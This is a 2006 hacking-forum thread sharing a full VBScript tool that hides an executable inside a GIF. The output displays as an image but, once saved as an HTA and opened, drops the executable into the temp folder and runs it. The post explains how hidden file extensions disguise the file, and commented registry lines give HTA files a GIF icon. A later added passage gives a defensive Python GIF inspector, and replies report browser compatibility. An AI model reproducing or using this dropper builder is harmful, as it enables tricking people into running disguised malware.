Steganography hide EXE data within a GIF image

HackForum

Steganography hide EXE data within a GIF image #
I found a pretty good VBS script that hides executable code in a *.GIF file ... And the best part is that the image displays in IE and Firefox, and when you right-click it and choose "Save As .." it gets saved as FILE.HTA, which contains the executable code ....

This is a link to the author [link]

This image contains a small Hypnotic program (hypnosis, a spinning spiral)
[link]
' Source code
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email: cyber_flash@hotmail.com


' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe

' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser. ;)
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")


' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.


' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.

' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become the de facto standard on the Web today.


' +----------------------------------------------------------------------------+
' | Let the games begin! |
' +----------------------------------------------------------------------------+

Option Explicit

Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x

set args=WScript.Arguments

If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
WScript.Quit
End If

pic=args(0)
file=args(1)

Dim o:Set o=CreateObject("Scripting.FileSystemObject")
Dim s:Set s=CreateObject("WScript.Shell")

'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\","%SystemRoot%\system32\shimgvw.dll,2","REG_SZ"

Set f=o.CreateTextFile(pic&".hta.gif",2)

WScript.Echo "Processing "&pic&" ..."

pic_buf=RSBinaryToString(ReadBinaryFile(pic))

' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)

' +----------------------------------------------------------------------------+
' | BEGIN: GIF comment block. |
' +----------------------------------------------------------------------------+

' Start new block tag.
f.Write chr(Int("&H21"))

' Comment tag.
f.Write chr(Int("&HFE"))

' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))

' Start data vbscript
f.WriteLine "<script language=vbs>"
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&")"
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.Shell"&chr(34)&")"
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)&"\"&file&chr(34)

' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
data=AsciiToHex(RSBinaryToString(ReadBinaryFile(file)))
ub=UBound(data)
For i=0 To ub-1
f.Write data(i)&","
Next
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr(34)&")"

f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr(34)&"&t(i)))"
f.WriteLine "Next"
f.WriteLine "f.close"

' Run the data!
f.WriteLine "s.run(p)"

f.WriteLine "close()"

' End data vbscript.
f.WriteLine "</script>"

' End of comment block.
f.Write chr(Int("&H00"))

' +----------------------------------------------------------------------------+
' | END: GIF comment block. |
' +----------------------------------------------------------------------------+

' Insert end of gif tag.
f.Write chr(Int("&H3B"))

f.Close

' +----------------------------------------------------------------------------+
' | Done. Your.gif.hta.gif has been created. |
' +----------------------------------------------------------------------------+

Set x=o.GetFile(pic&".hta.gif")

WScript.Echo "Created "&chr(34)&pic&".hta.gif"&chr(34)&" (bytes="&x.Size&")"


' +----------------------------------------------------------------------------+
' | Turns ASCII string sData into array of hex numerics. |
' +----------------------------------------------------------------------------+
Function AsciiToHex(sData)
Dim i, aTmp()

ReDim aTmp(Len(sData) - 1)

For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1)
Next

ASCIItoHex = aTmp
End Function


' +----------------------------------------------------------------------------+
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +----------------------------------------------------------------------------+
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)

If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function


' +----------------------------------------------------------------------------+
' | Read Binary file |
' +----------------------------------------------------------------------------+
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
BinaryStream.Close
End Function

(reply)
BOGIIE & Hacker112 | 85.207.107.* 26.12.2006 10:14
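
Defender-side view of the file layout the script above produces, as an added example that is not part of the original post or of Vengy's script: a strict GIF block walker that flags script markup inside comment extensions (0x21 0xFE), sub-block chains with no terminator, and bytes after the 0x3B trailer. The function names and marker list are assumptions, and the sample byte strings are constructed with inert placeholder text.

```python
import struct

# Markers worth flagging inside a GIF comment extension (assumed list, extend as needed).
SCRIPT_MARKERS = (b"<script", b"<hta:", b"createobject")

def _sub_blocks(buf, pos):
    """Walk length-prefixed sub-blocks; return (data, next_pos, complete)."""
    out = bytearray()
    while pos < len(buf):
        size = buf[pos]
        if size == 0:                       # block terminator
            return bytes(out), pos + 1, True
        out += buf[pos + 1:pos + 1 + size]
        pos += 1 + size
    return bytes(out), len(buf), False      # ran off the end: no terminator found

def _table_len(packed):
    """Byte length of a color table described by a packed-fields byte."""
    return 3 * (2 << (packed & 7)) if packed & 0x80 else 0

def inspect_gif(buf):
    """Return a list of findings; an empty list means the structure is clean."""
    if len(buf) < 13 or buf[:6] not in (b"GIF87a", b"GIF89a"):
        return ["not a GIF"]
    findings, pos = [], 13 + _table_len(buf[10])
    while True:
        tag = buf[pos] if pos < len(buf) else None
        if tag == 0x3B:                     # trailer must be the last byte
            if pos + 1 != len(buf):
                findings.append("data after trailer")
            return findings
        if tag == 0x21 and pos + 1 < len(buf):      # extension block
            label = buf[pos + 1]
            data, pos, ok = _sub_blocks(buf, pos + 2)
            if label == 0xFE and any(m in data.lower() for m in SCRIPT_MARKERS):
                findings.append("script markup in comment extension")
        elif tag == 0x2C and pos + 9 < len(buf):    # image descriptor
            pos += 10 + _table_len(buf[pos + 9])
            _, pos, ok = _sub_blocks(buf, pos + 1)  # skip LZW code-size byte
        else:
            ok = False
        if not ok:
            findings.append("malformed block structure")
            return findings

# Constructed samples: a minimal 1x1 GIF, and the same file with an oversized
# comment extension (single 0xFF length byte, then text) holding inert text.
CLEAN = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + b"\x00" * 3 + b"\xff" * 3
         + b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x44\x01\x00\x3B")
SUSPECT = (CLEAN[:-1] + b"\x21\xFE\xFF" + b"<script language=vbs>\r\n"
           + b"' inert constructed placeholder\r\n" * 12 + b"</script>\r\n\x00\x3B")
```

Because the comment block uses one 0xFF length byte for far more than 255 bytes of text, a strict walk usually also reports the broken sub-block chain, which is a useful signal even when the markers are obfuscated.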
re: Steganography hide EXE data within a GIF imag#
Nice little thing :)
(reply)
127.0.0.1 | 88.146.11.* 26.12.2006 13:51
re: Steganography hide EXE data within a GIF image #
Doesn't work in Opera 8-) it's probably a secure browser. But it's pretty LOL!!

----------
don't argue, it's not worth it | personal blog: [link]
(reply)
mzk | E-mail | Website 26.12.2006 15:47
re: Steganography hide EXE data within a GIF imag#
The combination of FF 2 and W98 doesn't work either..
(reply)
Nemam | 72.22.69.* 26.12.2006 16:21
